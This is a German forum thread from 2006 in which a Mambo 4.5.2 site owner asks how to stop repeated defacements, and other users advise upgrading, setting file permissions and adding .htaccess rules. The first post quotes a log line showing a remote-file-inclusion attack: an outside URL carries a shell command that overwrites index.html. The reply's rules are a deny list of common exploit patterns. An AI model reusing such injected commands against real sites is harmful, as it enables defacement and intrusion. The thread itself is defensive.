Immer wieder Hacker angriffe

**DK6_Dirty_Harry** · 22.08.2006 07:13

Hallo zusammen,
ich habe folgendes Problem, irgendwie schaffen es Hacker bei unserer Seite www.forum-dk6.de die index.php oder die configuratin.php zu ändern bzw. eine kompl. neue index.html raufzuladen! Ich habe jetzt folgendes in den logfiles gefunden:
http://geocities.com/thenextst/nextcha0z?&cmd=cd%20..;%20cd%20..;%20cd%20..;%20ec ho%20RickyFloW%20@%20HackBSD%20CreW>index.html
Wenn man nur http://geocities.com/thenextst eingibt im browser kommt man auf eine hackerseite!
Wer kann mir helfen das dieses nicht mehr passieren kann (ich bin Mambo-Anfänger).
Zur Info, es ist Mambo 4.5.2 inst.
Im voraus schon mal vielen Dank!

**holmi** · 22.08.2006 07:36

Mambo 4.5.2 ist hoffnungslos veraltet und hat sicherheitslücken!
Mach mindestens ein Update auf 4.5.4 plus patch
http://mamboxchange.com/frs/?group_id=5
Oder Joomla

Wie hatest du die Rechte bei der configuration.php eingestellt?

Björn

**DK6_Dirty_Harry** · 22.08.2006 10:10

die Rechte bei der configuration.php ist auf 444 eingestellt

**heyjoe2006** · 22.08.2006 12:09

Zitat von DK6_Dirty_Harry

die Rechte bei der configuration.php ist auf 444 eingestellt

verzeiung fuhr mein sclechtes deutsch. ich bin Niederlander.
Zuerst mambo upgraden nach Joomla 1.0.10. (Von mambo4.52 nach Joomla 1.0, weiter upgraden von 1.0 nach 1.0.10)
Nicht nur den config.php beschutzen, aber nog wichtiger, den index.php auf 600 von mamboroot UND index.php von templates\deinetemplate\index.php beschutzen.
Weiter den folgenden code im .htaccess file hineinfugen:

########## Begin - Rewrite rules to block out some common exploits
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*$.*$ [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

das sind die erste schritten. Weiter kannst du naturlich deine administrator folder mit ein kennwort beschutzen, dass muss irgendwo bei deine hosting provider beschrieben sein......
Weiter kansst du extension blocklist installieren:
http://www.joomla-addons.org/blocklist-component.html

usw. usw., aber ich denke dasst du jetzt die meiste attacks uberleben kannst....

Good luck, Joe

Thema: Immer wieder Hacker angriffe

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Immer wieder Hacker angriffe

bei mir auch....

Ähnliche Themen

Hacker suchen com_facileforms

Hacker Angriff

Hacker

Hacker suchen gezielt nach ungepatchten Mambo-Systemen

!HACKER ANGRIFF! "User Online" Statistik sprengt das Normale! übertriebene Zahlen!

Lesezeichen

Lesezeichen

Berechtigungen